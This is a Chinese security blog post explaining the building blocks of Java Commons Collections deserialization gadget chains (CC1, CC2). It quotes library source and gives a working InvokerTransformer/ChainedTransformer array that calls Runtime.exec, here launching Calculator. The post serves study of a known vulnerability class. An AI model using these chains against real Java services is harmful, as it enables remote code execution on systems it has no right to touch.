<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="CC链碎片, J1an&#39;s Little World">
    <meta name="description" content="CC链碎片众所周知，CC链本质上就是对不同的反序列化进行拼凑得到的，那么我们只要将其中的碎片进行总结再加以利用就可以构造出所有的CC链，这篇水文就是用来总结CC中的所有碎片的


三个Transform方法（CC链实现关键）使用链：都是关键">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>CC链碎片 | J1an&#39;s Little World</title>
    <link rel="icon" type="image/png" href="/favicon.png">
    


    <!-- bg-cover style     -->



<link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
<link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
<link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
<link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
<link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
<link rel="stylesheet" type="text/css" href="/css/matery.css">
<link rel="stylesheet" type="text/css" href="/css/my.css">
<link rel="stylesheet" type="text/css" href="/css/dark.css" media="none" onload="if(media!='all')media='all'">




    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
    <link rel="stylesheet" href="/css/post.css">




    



    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.0.0"><link rel="alternate" href="/atom.xml" title="J1an's Little World" type="application/atom+xml">
</head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">J1an&#39;s Little World</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
  <li>
    <a href="javascript:;" class="waves-effect waves-light" onclick="switchNightMode()" title="深色/浅色模式" >
      <i id="sum-moon-icon" class="fas fa-sun" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">J1an&#39;s Little World</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/23.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">CC链碎片</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-11-21
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.min.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="CC链碎片"><a href="#CC链碎片" class="headerlink" title="CC链碎片"></a>CC链碎片</h1><p>众所周知，CC链本质上就是对不同的反序列化进行拼凑得到的，那么我们只要将其中的碎片进行总结再加以利用就可以构造出所有的CC链，这篇水文就是用来总结CC中的所有碎片的</p>
<span id="more"></span>

<h2 id="三个Transform方法（CC链实现关键）"><a href="#三个Transform方法（CC链实现关键）" class="headerlink" title="三个Transform方法（CC链实现关键）"></a>三个Transform方法（CC链实现关键）</h2><p>使用链：都是关键了你说谁用</p>
<ol>
<li><h3 id="InvokerTransformer（调用者转换器）"><a href="#InvokerTransformer（调用者转换器）" class="headerlink" title="InvokerTransformer（调用者转换器）"></a>InvokerTransformer（调用者转换器）</h3><p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202211072202716.png"></p>
<p>可以看到通过获取<code>this.iMethodName, this.iParamTypes, this.iArgs</code>来反射调用传入类的方法，其中内容都可控，那我们是不是只要传入一个Runtime对象，调用其中的exec方法，就能任意命令执行了呢</p>
<p>直接调用可行性验证</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202211072215402.png"></p>
<p>发现成功执行了，但是直接找到⼀个类，它在反序列化的 <code>readObject</code> 里直接或间接调用了 <code>InvokerTransformer</code> 的 <code>transform</code> 方法，并且参数可控，就能RCE，是这样吗？肯定不是，我们都知道待序列化的对象和所有它使⽤的内部属性对象，必须都实现了 <code>java.io.Serializable</code> 接⼝。我们需要传给 <code>transform</code> 方法的参数是 <code>Runtime</code> 对象，在序列化的时候肯定也属于内部属性对象，而它是没有实现 <code>java.io.Serializable</code> 接⼝的，所以即使找到了符合条件的类也没办法构造成序列化数据。</p>
</li>
<li><h3 id="ChainedTransformer（链条转换器）"><a href="#ChainedTransformer（链条转换器）" class="headerlink" title="ChainedTransformer（链条转换器）"></a>ChainedTransformer（链条转换器）</h3><p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202211081031321.png"></p>
<p>此类的transform通过按顺序调用 <code>Transformer</code> 数组 <code>this.iTransformers</code> 中所有 <code>Transformer</code> 对象的 <code>transform</code> 方法，并且每次调用的结果传递给下一个项目的transform进行调用，就像一个链条一样逐层传递执行，那么二者结合我们就可以利用<code>InvokerTransformer</code>通过反射来间接生成一个<code>Runtime</code>类，进而RCE</p>
<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token comment">//反射获取Runtime类</span>
<span class="token class-name">Class</span> clazz <span class="token operator">=</span> <span class="token class-name">Class</span><span class="token punctuation">.</span><span class="token function">forName</span><span class="token punctuation">(</span><span class="token string">"java.lang.Runtime"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Method</span> getRuntimeMethod <span class="token operator">=</span> clazz<span class="token punctuation">.</span><span class="token function">getMethod</span><span class="token punctuation">(</span><span class="token string">"getRuntime"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Runtime</span> runtime <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token class-name">Runtime</span><span class="token punctuation">)</span> getRuntimeMethod<span class="token punctuation">.</span><span class="token function">invoke</span><span class="token punctuation">(</span><span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
runtime<span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token comment">//链式调用写法</span>
<span class="token class-name">Transformer</span><span class="token punctuation">[</span><span class="token punctuation">]</span> transformers <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Transformer</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">&#123;</span>
        <span class="token keyword">new</span> <span class="token class-name">InvokerTransformer</span><span class="token punctuation">(</span><span class="token comment">//生成Runtime类对象，此处也可使用ConstantTransformer直接调用Runtime.class</span>
                <span class="token string">"forName"</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token class-name">String</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">Object</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token string">"java.lang.Runtime"</span><span class="token punctuation">&#125;</span>
        <span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token keyword">new</span> <span class="token class-name">InvokerTransformer</span><span class="token punctuation">(</span><span class="token comment">//获取getRuntime方法</span>
                <span class="token string">"getMethod"</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token class-name">String</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">,</span><span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">Object</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token string">"getRuntime"</span><span class="token punctuation">,</span><span class="token keyword">new</span> <span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">&#125;</span>
        <span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token keyword">new</span> <span class="token class-name">InvokerTransformer</span><span class="token punctuation">(</span><span class="token string">"invoke"</span><span class="token punctuation">,</span> <span class="token keyword">new</span> <span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token comment">//获取invoke方法执行</span>
                <span class="token class-name">Object</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">,</span> <span class="token class-name">Object</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token keyword">class</span> <span class="token punctuation">&#125;</span><span class="token punctuation">,</span> <span class="token keyword">new</span> <span class="token class-name">Object</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span>
                <span class="token keyword">null</span><span class="token punctuation">,</span> <span class="token keyword">new</span> <span class="token class-name">Object</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token punctuation">&#125;</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token keyword">new</span> <span class="token class-name">InvokerTransformer</span><span class="token punctuation">(</span><span class="token comment">//RCE</span>
                <span class="token string">"exec"</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">Class</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token punctuation">&#123;</span><span class="token class-name">String</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">&#125;</span><span class="token punctuation">,</span>
                <span class="token keyword">new</span> <span class="token class-name">String</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">&#123;</span><span class="token string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span><span class="token punctuation">&#125;</span>
        <span class="token punctuation">)</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>最后调用 <code>ChainedTransformer#transform()</code> 即可,参数为 <code>class</code>对象<code>Class.class</code></p>
<p>最后就是我们怎么获取到一个class对象作为我们链式调用的起点，我们继续往下走</p>
</li>
<li><h3 id="ConstantTransformer（常量转换器）"><a href="#ConstantTransformer（常量转换器）" class="headerlink" title="ConstantTransformer（常量转换器）"></a>ConstantTransformer（常量转换器）</h3><p>最后我们再来看<code>ConstantTransformer</code>，这个类实现了序列化接口所以也可以进行反序列化</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202211100043086.png"></p>
<p>可以看到<code>transform</code>函数就直接返回了<code>this.iConstant</code>，这里的<code>iConstant</code>我们直接传入即可，说白了就是拿一个对象包裹一个对象（听起来多少有点没用），不过，由于其<code>transform</code>方法会将其中的<code>iConstant</code>直接返回，我们就可以在其中包裹一个class类对象来作为上面的链式调用的起点，最终构造的链子如下</p>
<p><img src="https://jlan-blog.oss-cn-beijing.aliyuncs.com/202211100110622.png"></p>
<p>最终只要调用<code>transform</code>随便扔点啥进去都能调用成功</p>
</li>
<li><h3 id="InstantiateTransformer（实例化转换器）"><a href="#InstantiateTransformer（实例化转换器）" class="headerlink" title="InstantiateTransformer（实例化转换器）"></a>InstantiateTransformer（实例化转换器）</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public Object transform(Object input) &#123;
    try &#123;
        if (input instanceof Class &#x3D;&#x3D; false) &#123;
            throw new FunctorException(
                &quot;InstantiateTransformer: Input object was not an instanceof Class, it was a &quot;
                    + (input &#x3D;&#x3D; null ? &quot;null object&quot; : input.getClass().getName()));
        &#125;
        Constructor con &#x3D; ((Class) input).getConstructor(iParamTypes);
        return con.newInstance(iArgs);

    &#125; catch (NoSuchMethodException ex) &#123;
        throw new FunctorException(&quot;InstantiateTransformer: The constructor must exist and be public &quot;);
    &#125; catch (InstantiationException ex) &#123;
        throw new FunctorException(&quot;InstantiateTransformer: InstantiationException&quot;, ex);
    &#125; catch (IllegalAccessException ex) &#123;
        throw new FunctorException(&quot;InstantiateTransformer: Constructor must be public&quot;, ex);
    &#125; catch (InvocationTargetException ex) &#123;
        throw new FunctorException(&quot;InstantiateTransformer: Constructor threw an exception&quot;, ex);
    &#125;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这个类的关键点也在transform处，相当于调用了传入内容的类的构造函数，然后再加上TrAXFilter类来进行RCE，所以也可以说这两个类是连在一起使用的</p>
</li>
</ol>
<h2 id="AnnotationInvocationHandler"><a href="#AnnotationInvocationHandler" class="headerlink" title="AnnotationInvocationHandler"></a>AnnotationInvocationHandler</h2><p>使用链：CC1</p>
<p>首先我们要知道的一点是，对于任意一个代理后的类，在调用类的任意方法时，都会调用其invoke方法，所以这个类有两个使用点，一个是作为readObject反序列化的起点，一个是作为代理中的类进行重写进而对代理的Map类的get方法进行触发</p>
<h3 id="readObject"><a href="#readObject" class="headerlink" title="readObject"></a>readObject</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException &#123;
        var1.defaultReadObject();
        AnnotationType var2 &#x3D; null;

        try &#123;
            var2 &#x3D; AnnotationType.getInstance(this.type);
        &#125; catch (IllegalArgumentException var9) &#123;
            throw new InvalidObjectException(&quot;Non-annotation type in annotation serial stream&quot;);
        &#125;

        Map var3 &#x3D; var2.memberTypes();
        Iterator var4 &#x3D; this.memberValues.entrySet().iterator();

        while(var4.hasNext()) &#123;
            Map.Entry var5 &#x3D; (Map.Entry)var4.next();
            String var6 &#x3D; (String)var5.getKey();
            Class var7 &#x3D; (Class)var3.get(var6);
            if (var7 !&#x3D; null) &#123;
                Object var8 &#x3D; var5.getValue();
                if (!var7.isInstance(var8) &amp;&amp; !(var8 instanceof ExceptionProxy)) &#123;
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + &quot;[&quot; + var8 + &quot;]&quot;)).setMember((Method)var2.members().get(var6)));
                &#125;
            &#125;
        &#125;

    &#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处触发了memberValues的enteySet方法，由于我们设置的memberValues是被代理的Map类，所以会进入下一步，AnnotationInvocationHandler的invoke方法</p>
<h3 id="invoke"><a href="#invoke" class="headerlink" title="invoke"></a>invoke</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public Object invoke(Object var1, Method var2, Object[] var3) &#123;
        String var4 &#x3D; var2.getName();
        Class[] var5 &#x3D; var2.getParameterTypes();
        if (var4.equals(&quot;equals&quot;) &amp;&amp; var5.length &#x3D;&#x3D; 1 &amp;&amp; var5[0] &#x3D;&#x3D; Object.class) &#123;
            return this.equalsImpl(var3[0]);
        &#125; else if (var5.length !&#x3D; 0) &#123;
            throw new AssertionError(&quot;Too many parameters for an annotation method&quot;);
        &#125; else &#123;
            switch (var4) &#123;
                case &quot;toString&quot;:
                    return this.toStringImpl();
                case &quot;hashCode&quot;:
                    return this.hashCodeImpl();
                case &quot;annotationType&quot;:
                    return this.type;
                default:
                    Object var6 &#x3D; this.memberValues.get(var4);
                    if (var6 &#x3D;&#x3D; null) &#123;
                        throw new IncompleteAnnotationException(this.type, var4);
                    &#125; else if (var6 instanceof ExceptionProxy) &#123;
                        throw ((ExceptionProxy)var6).generateException();
                    &#125; else &#123;
                        if (var6.getClass().isArray() &amp;&amp; Array.getLength(var6) !&#x3D; 0) &#123;
                            var6 &#x3D; this.cloneArray(var6);
                        &#125;

                        return var6;
                    &#125;
            &#125;
        &#125;
    &#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看到调用了memberValues的get方法这里便是对Map（实际调用LazyMap）的get方法的调用</p>
<h2 id="LazyMap（Map）"><a href="#LazyMap（Map）" class="headerlink" title="LazyMap（Map）"></a>LazyMap（Map）</h2><p>使用链：CC1</p>
<p>一个小小的关键点，在调用equals会看到，因为我在看的时候在这个类里一直都没看到equals方法，<code>public class LazyMap extends AbstractMapDecorator implements Map, Serializable</code>继承和实现的类<code>AbstractMapDecorator</code>中是有equals方法的，跟入</p>
<h3 id="get"><a href="#get" class="headerlink" title="get"></a>get</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public Object get(Object key) &#123;
    if (map.containsKey(key) &#x3D;&#x3D; false) &#123;
        Object value &#x3D; factory.transform(key);
        map.put(key, value);
        return value;
    &#125;
    return map.get(key);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可见get方法中对key调用了factory的transform方法，此处的factory可控并且为Transformer类（我们一般使用chainedTransformer来调用），触发chainedTransformer链式调用</p>
<h3 id="equals（AbstractMapDecorator）"><a href="#equals（AbstractMapDecorator）" class="headerlink" title="equals（AbstractMapDecorator）"></a>equals<em>（AbstractMapDecorator）</em></h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public boolean equals(Object object) &#123;
    if (object &#x3D;&#x3D; this) &#123;
        return true;
    &#125;
    return map.equals(object);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处map只要是map类就行，就是本来的LazyMap本人，继续调用<code>AbstractMap</code>中的euqals</p>
<p>equals（AbstractMap）</p>
<pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public boolean equals(Object o) &#123;
    if (o &#x3D;&#x3D; this)
        return true;

    if (!(o instanceof Map))
        return false;
    Map&lt;K,V&gt; m &#x3D; (Map&lt;K,V&gt;) o;
    if (m.size() !&#x3D; size())
        return false;

    try &#123;
        Iterator&lt;Entry&lt;K,V&gt;&gt; i &#x3D; entrySet().iterator();
        while (i.hasNext()) &#123;
            Entry&lt;K,V&gt; e &#x3D; i.next();
            K key &#x3D; e.getKey();
            V value &#x3D; e.getValue();
            if (value &#x3D;&#x3D; null) &#123;
                if (!(m.get(key)&#x3D;&#x3D;null &amp;&amp; m.containsKey(key)))
                    return false;
            &#125; else &#123;
                if (!value.equals(m.get(key)))
                    return false;
            &#125;
        &#125;
    &#125; catch (ClassCastException unused) &#123;
        return false;
    &#125; catch (NullPointerException unused) &#123;
        return false;
    &#125;

    return true;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看到调用了m.get，LazyMap结束</p>
<h2 id="PriorityQueue"><a href="#PriorityQueue" class="headerlink" title="PriorityQueue"></a>PriorityQueue</h2><p>使用链：CC2</p>
<h3 id="readObject-1"><a href="#readObject-1" class="headerlink" title="readObject"></a>readObject</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException &#123;
    &#x2F;&#x2F; Read in size, and any hidden stuff
    s.defaultReadObject();

    &#x2F;&#x2F; Read in (and discard) array length
    s.readInt();

    queue &#x3D; new Object[size];

    &#x2F;&#x2F; Read in all elements.
    for (int i &#x3D; 0; i &lt; size; i++)
        queue[i] &#x3D; s.readObject();

    &#x2F;&#x2F; Elements are guaranteed to be in &quot;proper order&quot;, but the
    &#x2F;&#x2F; spec has never explained what that might be.
    heapify();
&#125;
&#x2F;&#x2F;这里readObject-&gt;heapify-&gt;siftDown-&gt;siftDownUsingComparator中间过程不再赘述，感兴趣的可以自己走一遍（也没两句代码）<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>就最后一句有用</p>
<h3 id="siftDownUsingComparator（用Comparator进行降序排序）"><a href="#siftDownUsingComparator（用Comparator进行降序排序）" class="headerlink" title="siftDownUsingComparator（用Comparator进行降序排序）"></a>siftDownUsingComparator（用Comparator进行降序排序）</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">private void siftDownUsingComparator(int k, E x) &#123;
    int half &#x3D; size &gt;&gt;&gt; 1;
    while (k &lt; half) &#123;
        int child &#x3D; (k &lt;&lt; 1) + 1;
        Object c &#x3D; queue[child];
        int right &#x3D; child + 1;
        if (right &lt; size &amp;&amp;
            comparator.compare((E) c, (E) queue[right]) &gt; 0)
            c &#x3D; queue[child &#x3D; right];
        if (comparator.compare(x, (E) c) &lt;&#x3D; 0)
            break;
        queue[k] &#x3D; c;
        k &#x3D; child;
    &#125;
    queue[k] &#x3D; x;
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>此处关键在于调用了comparator.compare，此处的Comparator我们可控，一般定义为TransformingComparator，这样我对PriorityQueue就结束了</p>
<h2 id="TransformingComparator"><a href="#TransformingComparator" class="headerlink" title="TransformingComparator"></a>TransformingComparator</h2><p>利用链：CC2</p>
<h3 id="compare"><a href="#compare" class="headerlink" title="compare"></a>compare</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public int compare(Object obj1, Object obj2) &#123;
    Object value1 &#x3D; this.transformer.transform(obj1);
    Object value2 &#x3D; this.transformer.transform(obj2);
    return this.decorated.compare(value1, value2);
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>不用多说了吧，直接调用transform方法了，transformer可控</p>
<h2 id="TrAXFilter"><a href="#TrAXFilter" class="headerlink" title="TrAXFilter"></a>TrAXFilter</h2><p>利用链：</p>
<p>该类一般和InstantiateTransformer一起使用进行RCE</p>
<h3 id="TrAXFilter（构造函数）"><a href="#TrAXFilter（构造函数）" class="headerlink" title="TrAXFilter（构造函数）"></a>TrAXFilter（构造函数）</h3><pre class="line-numbers language-Java" data-language="Java"><code class="language-Java">public TrAXFilter(Templates templates)  throws
    TransformerConfigurationException
&#123;
    _templates &#x3D; templates;
    _transformer &#x3D; (TransformerImpl) templates.newTransformer();
    _transformerHandler &#x3D; new TransformerHandlerImpl(_transformer);
    _useServicesMechanism &#x3D; _transformer.useServicesMechnism();
&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>这里能看到构造函数调用了templates.newTransformer方法，此处templates可控并且为Templates类，我们传入一个TemplatesImpl类对象，加载恶意字节码即可RCE（见CB1链）</p>
